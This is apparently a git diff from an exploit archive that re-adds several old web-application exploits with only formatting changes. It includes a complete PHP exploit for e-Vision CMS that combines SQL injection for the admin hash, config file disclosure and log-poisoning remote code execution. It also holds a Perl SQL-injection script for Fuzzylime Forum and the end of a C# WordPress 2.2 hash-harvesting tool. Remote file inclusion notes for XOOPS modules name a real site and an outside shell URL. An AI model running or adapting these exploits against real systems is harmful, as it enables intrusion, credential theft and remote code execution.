+                    Console.WriteLine("Error:\n{0}", response);
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("Error:\n" + ex.ToString());
+            }
+        }
+    }
+
+    private static string GetCookieHash(string targetUrl)
+    {
+        WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
+        request.Method = "HEAD";
+        (request as HttpWebRequest).AllowAutoRedirect = false;
+
+        WebResponse response = request.GetResponse();
+        if (response != null)
+        {
+            Match match = Regex.Match(response.Headers["Set-Cookie"],
+                    @"wordpress[a-z]+_([a-z\d]{32})",
+                    RegexOptions.IgnoreCase);
+
+            if (match.Success)
+                return match.Groups[1].Value;
+        }
+        return string.Empty;
+    }
+    public static string MD5(string password)
+    {
+        MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
+        byte[] bs = Encoding.UTF8.GetBytes(password);
+        bs = x.ComputeHash(bs);
+        StringBuilder s = new StringBuilder();
+        foreach (byte b in bs)
+        {
+            s.Append(b.ToString("x2").ToLower());
+        }
+        return s.ToString();
+    }
+}
+/*
+Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php.
+
+o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5.
+
+    static void Main(string[] args)
+    {
+        string targetUrl = "http://localhost/wp/";
+        string login = "alex";
+        string password = "1234";
+
+hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
+Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]
+
+:: [Slappter] ::
+*/
+
+# milw0rm.com [2007-06-06]
diff --git a/platforms/php/webapps/4041.htm b/platforms/php/webapps/4041.htm
index eef007da6..367f6e8d2 100755
--- a/platforms/php/webapps/4041.htm
+++ b/platforms/php/webapps/4041.htm
@@ -1,81 +1,81 @@
-
-
-
-newsSync 1.5.0rc6 (nuke_include.php) Remote File Inclusion 
-Exploit
-
-
-
-
-
-
-
    
-
-
    newsSync 1.5.0rc6 
-(nuke_include.php) Remote File Inclusion Exploit
    
-
-
    
-
    
-    Target:[http://[vicim]/[path]
-   
-  
    
-  
    
-
    
-

    
-
-
    
-
-Mahmood_ali
    
-
-TrYaG-Team
    
-
    
-
    
-
-
-
-
-# milw0rm.com [2007-06-07]
+
+
+
+newsSync 1.5.0rc6 (nuke_include.php) Remote File Inclusion 
+Exploit
+
+
+
+
+
+
+
    
+
+
    newsSync 1.5.0rc6 
+(nuke_include.php) Remote File Inclusion Exploit
    
+
+
    
+
    
+    Target:[http://[vicim]/[path]
+   
+  
    
+  
    
+
    
+

    
+
+
    
+
+Mahmood_ali
    
+
+TrYaG-Team
    
+
    
+
    
+
+
+
+
+# milw0rm.com [2007-06-07]
diff --git a/platforms/php/webapps/4054.php b/platforms/php/webapps/4054.php
index 669262d28..106caae64 100755
--- a/platforms/php/webapps/4054.php
+++ b/platforms/php/webapps/4054.php
@@ -1,299 +1,299 @@
-#!/usr/bin/php -q -d short_open_tag=on
-
-#
-#################
-
-...need i say more?
-
-
-
-Bug #2 (admin/functions.php):
-
-#################
-#
-#	if ( isset($_COOKIE['adminlang']) ) { $language_selector = $_COOKIE['adminlang']; }
-#	else { $language_selector = "en"; }
-#	include("lang/".$language_selector.".php");
-#
-#################
-
-...speaks for it self really.
-
-
-
-Bug #3 ();
-
-#################
-#
-#	$sql = "SELECT `style_css` FROM `templates` WHERE `id`='".$_GET['template']."' AND `show`='Y' AND `trash`='N'";
-#	$result = mysql_query($sql) or die(mysql_error());
-#	$row = mysql_fetch_array($result);
-#	$css .= $row['style_css'];
-#
-#################
-
-...again appauling!
-
-*/
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-if ($argc<4) {
-print "-------------------------------------------------------------------------\r\n";
-print "    e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "Usage: w4ck1ng_evision.php [OPTION] [HOST] [PATH] ([USER] [PASS] [COMMAND])\r\n\r\n";
-print "[OPTION]  = 0 = SQL Injection (Admin user & hash retrieval)\r\n";
-print "            1 = Config File Disclosure (Database user & pass retrieval)\r\n";
-print "            2 = Remote Code Execution\r\n";
-print "[HOST] 	  = Target server's hostname or ip address\r\n";
-print "[PATH] 	  = Path where e-Vision CMS is located\r\n";
-print "[COMMAND] = Command to execute\r\n\r\n";
-print "e.g. w4ck1ng_evision.php 0 victim.com /\r\n";
-print "     w4ck1ng_evision.php 1 victim.com /\r\n";
-print "     w4ck1ng_evision.php 2 victim.com / username password \"ls -lia\"\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "            		 http://www.w4ck1ng.com\r\n";
-print "            		        ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-die;
-}
-
-//Props to rgod for the following functions
-
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$exploit = $argv[1];
-$host = $argv[2];
-$path = $argv[3];
-$cmd  = $argv[4];
-$cmd  = urlencode($cmd);
-$port=80;$proxy="";
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-function head(){
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "    e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-
-		}
-
-function footer(){
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-		}
-
-if ($exploit==0){
-
-    head();
-   
-    $sql = "-999' UNION SELECT CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),pass) FROM users WHERE idusers=1 /*";
-    $sql = urlencode($sql);
-    $packet ="GET " . $path . "style.php?template=" . $sql . " HTTP/1.1\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    sendpacketii($packet);
-
-    if (strstr($html,"Username="))
-     {
-       $temp=explode("::Hash=",$html);
-       $temp2=explode("Username=",$temp[0]);
-
-	    echo "[+] Admin User: " . $temp2[1] . "\n";
-
-       $temp=explode("Username=",$html);
-       $temp2=explode("::Hash=",$temp[1]);
-
-	    echo "[+] Admin Hash: " . $temp2[1] . "\r\n";
-
-	footer();
-       die;
-     }
-
-else{die(); exit();}}
-
-if($exploit==1){
-
-    $sploit = "admin/show_img.php?img=../vars.php";
-    $packet ="GET " . $path . $sploit . " HTTP/1.1\r\n";
-    $packet.="Host: " . $host . "\r\n";
-    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    sendpacketii($packet);
-
-    if (strstr($html,"";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-
-sendpacketii($packet);
-
-$paths= array (
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../../../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $p . "admin/functions.php?cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
-$packet.="Host: " . $host . "\r\n"; 
-$packet.="Cookie: adminlang=" . $paths[$i] . "%00\r\n"; 
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
-    {
-     $temp=explode("w4ckw4ck",$html);
-	head();
-        echo $temp[1];
-	footer();
-	exit;
-    }
-}
-
-	head();
-        echo "[-] Exploit Failed...\r\n";
-	footer();
-
-}
-
-?>
-
-# milw0rm.com [2007-06-08]
+#!/usr/bin/php -q -d short_open_tag=on
+
+#
+#################
+
+...need i say more?
+
+
+
+Bug #2 (admin/functions.php):
+
+#################
+#
+#	if ( isset($_COOKIE['adminlang']) ) { $language_selector = $_COOKIE['adminlang']; }
+#	else { $language_selector = "en"; }
+#	include("lang/".$language_selector.".php");
+#
+#################
+
+...speaks for it self really.
+
+
+
+Bug #3 ();
+
+#################
+#
+#	$sql = "SELECT `style_css` FROM `templates` WHERE `id`='".$_GET['template']."' AND `show`='Y' AND `trash`='N'";
+#	$result = mysql_query($sql) or die(mysql_error());
+#	$row = mysql_fetch_array($result);
+#	$css .= $row['style_css'];
+#
+#################
+
+...again appauling!
+
+*/
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+if ($argc<4) {
+print "-------------------------------------------------------------------------\r\n";
+print "    e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_evision.php [OPTION] [HOST] [PATH] ([USER] [PASS] [COMMAND])\r\n\r\n";
+print "[OPTION]  = 0 = SQL Injection (Admin user & hash retrieval)\r\n";
+print "            1 = Config File Disclosure (Database user & pass retrieval)\r\n";
+print "            2 = Remote Code Execution\r\n";
+print "[HOST] 	  = Target server's hostname or ip address\r\n";
+print "[PATH] 	  = Path where e-Vision CMS is located\r\n";
+print "[COMMAND] = Command to execute\r\n\r\n";
+print "e.g. w4ck1ng_evision.php 0 victim.com /\r\n";
+print "     w4ck1ng_evision.php 1 victim.com /\r\n";
+print "     w4ck1ng_evision.php 2 victim.com / username password \"ls -lia\"\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+die;
+}
+
+//Props to rgod for the following functions
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$exploit = $argv[1];
+$host = $argv[2];
+$path = $argv[3];
+$cmd  = $argv[4];
+$cmd  = urlencode($cmd);
+$port=80;$proxy="";
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+function head(){
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "    e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+
+		}
+
+function footer(){
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+		}
+
+if ($exploit==0){
+
+    head();
+   
+    $sql = "-999' UNION SELECT CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),pass) FROM users WHERE idusers=1 /*";
+    $sql = urlencode($sql);
+    $packet ="GET " . $path . "style.php?template=" . $sql . " HTTP/1.1\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+    if (strstr($html,"Username="))
+     {
+       $temp=explode("::Hash=",$html);
+       $temp2=explode("Username=",$temp[0]);
+
+	    echo "[+] Admin User: " . $temp2[1] . "\n";
+
+       $temp=explode("Username=",$html);
+       $temp2=explode("::Hash=",$temp[1]);
+
+	    echo "[+] Admin Hash: " . $temp2[1] . "\r\n";
+
+	footer();
+       die;
+     }
+
+else{die(); exit();}}
+
+if($exploit==1){
+
+    $sploit = "admin/show_img.php?img=../vars.php";
+    $packet ="GET " . $path . $sploit . " HTTP/1.1\r\n";
+    $packet.="Host: " . $host . "\r\n";
+    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+    if (strstr($html,"";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+
+sendpacketii($packet);
+
+$paths= array (
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../../../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $p . "admin/functions.php?cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+$packet.="Host: " . $host . "\r\n"; 
+$packet.="Cookie: adminlang=" . $paths[$i] . "%00\r\n"; 
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+    {
+     $temp=explode("w4ckw4ck",$html);
+	head();
+        echo $temp[1];
+	footer();
+	exit;
+    }
+}
+
+	head();
+        echo "[-] Exploit Failed...\r\n";
+	footer();
+
+}
+
+?>
+
+# milw0rm.com [2007-06-08]
diff --git a/platforms/php/webapps/4055.htm b/platforms/php/webapps/4055.htm
index b01510320..d5ca6980e 100755
--- a/platforms/php/webapps/4055.htm
+++ b/platforms/php/webapps/4055.htm
@@ -1,61 +1,61 @@
-
-
-
-PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion 
-Exploit
-
-
-
-
-
-
-
    
-
-
    PHP Real Estate (header.php) Remote File Inclusion Exploit
    
-
-
    
-
    
-    Target:
-	[http://[vittima]/[path]
-   
-  
    
-  
    
-
    
-

    
-
-
    
-
-# notsec.com [08-06-2007]
    
-
    
-
    
-
-
-
-
-# milw0rm.com [2007-06-09]
+
+
+
+PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion 
+Exploit
+
+
+
+
+
+
+
    
+
+
    PHP Real Estate (header.php) Remote File Inclusion Exploit
    
+
+
    
+
    
+    Target:
+	[http://[vittima]/[path]
+   
+  
    
+  
    
+
    
+

    
+
+
    
+
+# notsec.com [08-06-2007]
    
+
    
+
    
+
+
+
+
+# milw0rm.com [2007-06-09]
diff --git a/platforms/php/webapps/406.pl b/platforms/php/webapps/406.pl
index d1532ddba..79f4f2889 100755
--- a/platforms/php/webapps/406.pl
+++ b/platforms/php/webapps/406.pl
@@ -56,6 +56,6 @@ print $_;
 print "\n";
 
 close $remote;
-
-
-# milw0rm.com [2004-08-20]
+
+
+# milw0rm.com [2004-08-20]
diff --git a/platforms/php/webapps/4062.pl b/platforms/php/webapps/4062.pl
index 6e13a5464..25fa5f208 100755
--- a/platforms/php/webapps/4062.pl
+++ b/platforms/php/webapps/4062.pl
@@ -1,52 +1,52 @@
-#!/usr/bin/perl -w
-
-#################################################################################
-#										#
-#		   Fuzzylime Forum 1.0 SQL Injection Exploit			#
-#										#
-# Discovered by: Silentz							#
-# Payload: Admin Username & Hash Retrieval					#
-# Website: http://www.w4ck1ng.com						#
-# 										#
-# Vulnerable Code (low.php): 							#
-#										#
-#      $gettopicid = mysql_query("SELECT * FROM ${table_prefix}threads 		#
-#      WHERE threadid='$_GET[topic]'");						#
-#										#
-# PoC: http://victim.com/low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),	#
-#      username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE 		#
-#      userid=1/*								#
-# 										#
-# Subject To: magic_quotes_gpc set to off					#
-# GoogleDork: Get your own!							#
-#										#
-# Shoutz: The entire w4ck1ng community						#
-#										#
-# NOTE: You can also grab the username & hash via a cookie logger and this XSS:	#
-#										#
-#	http://victim.com/low.php?topic=">		#
-#										#
-#################################################################################
-
-use LWP::UserAgent;
-die "Example: exploit.pl http://victim.com/\n" unless @ARGV;
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*";
-
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-if ($answer =~ /raquo; :(.*?):/){
-	print "\nBrought to you by w4ck1ng.com...\n";
-	print "\n[+] Admin User : $1";
-}
-
-if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n";}
-
-else{print "\n[-] Exploit Failed...\n";}
-
-# milw0rm.com [2007-06-12]
+#!/usr/bin/perl -w
+
+#################################################################################
+#										#
+#		   Fuzzylime Forum 1.0 SQL Injection Exploit			#
+#										#
+# Discovered by: Silentz							#
+# Payload: Admin Username & Hash Retrieval					#
+# Website: http://www.w4ck1ng.com						#
+# 										#
+# Vulnerable Code (low.php): 							#
+#										#
+#      $gettopicid = mysql_query("SELECT * FROM ${table_prefix}threads 		#
+#      WHERE threadid='$_GET[topic]'");						#
+#										#
+# PoC: http://victim.com/low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),	#
+#      username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE 		#
+#      userid=1/*								#
+# 										#
+# Subject To: magic_quotes_gpc set to off					#
+# GoogleDork: Get your own!							#
+#										#
+# Shoutz: The entire w4ck1ng community						#
+#										#
+# NOTE: You can also grab the username & hash via a cookie logger and this XSS:	#
+#										#
+#	http://victim.com/low.php?topic=">		#
+#										#
+#################################################################################
+
+use LWP::UserAgent;
+die "Example: exploit.pl http://victim.com/\n" unless @ARGV;
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*";
+
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+if ($answer =~ /raquo; :(.*?):/){
+	print "\nBrought to you by w4ck1ng.com...\n";
+	print "\n[+] Admin User : $1";
+}
+
+if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n";}
+
+else{print "\n[-] Exploit Failed...\n";}
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/php/webapps/4063.txt b/platforms/php/webapps/4063.txt
index c0ffe5780..ec2deb116 100755
--- a/platforms/php/webapps/4063.txt
+++ b/platforms/php/webapps/4063.txt
@@ -1,19 +1,19 @@
-~~~~~~~~~~~~~~~~~~~~~~~
-XOOPS Module TinyContent Remote File Inclusion
-version: < 1.5
-source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
-~~~~~~~~~~~~~~~~~~~~~~
-Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
-~~~~~~~~~~~~~~~~~~~~~~
-BUG:
-http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
-
-Vuln site:
-http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
-Contact: splo1t[at]yahoo[dot]com
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-# milw0rm.com [2007-06-12]
+~~~~~~~~~~~~~~~~~~~~~~~
+XOOPS Module TinyContent Remote File Inclusion
+version: < 1.5
+source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
+~~~~~~~~~~~~~~~~~~~~~~
+Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
+~~~~~~~~~~~~~~~~~~~~~~
+BUG:
+http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
+
+Vuln site:
+http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
+Contact: splo1t[at]yahoo[dot]com
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/php/webapps/4064.txt b/platforms/php/webapps/4064.txt
index e750f77d9..6ab37c9fc 100755
--- a/platforms/php/webapps/4064.txt
+++ b/platforms/php/webapps/4064.txt
@@ -1,13 +1,13 @@
-BeyazKurt - B3yazKurt@Hotmail.Com
-
-XOOPS Modules Horoscope
-
-http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
-
-modules/horoscope/footer.php?xoopsConfig[root_path]=
-
-{NetLife Since : '2003-4'}
-
-Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
-
-# milw0rm.com [2007-06-12]
+BeyazKurt - B3yazKurt@Hotmail.Com
+
+XOOPS Modules Horoscope
+
+http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
+
+modules/horoscope/footer.php?xoopsConfig[root_path]=
+
+{NetLife Since : '2003-4'}
+
+Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/php/webapps/4068.txt b/platforms/php/webapps/4068.txt
index f64842d86..7f72abcf2 100755
--- a/platforms/php/webapps/4068.txt
+++ b/platforms/php/webapps/4068.txt
@@ -1,20 +1,20 @@
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-XOOPS Module XFsection Remote File Inclusion
-version: < 1.07
-source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
-Contact: splo1t[at]yahoo[dot]com
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Note:
-In some cases you will need to be authenticated.
-
-# milw0rm.com [2007-06-13]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+XOOPS Module XFsection Remote File Inclusion
+version: < 1.07
+source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
+Contact: splo1t[at]yahoo[dot]com
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Note:
+In some cases you will need to be authenticated.
+
+# milw0rm.com [2007-06-13]
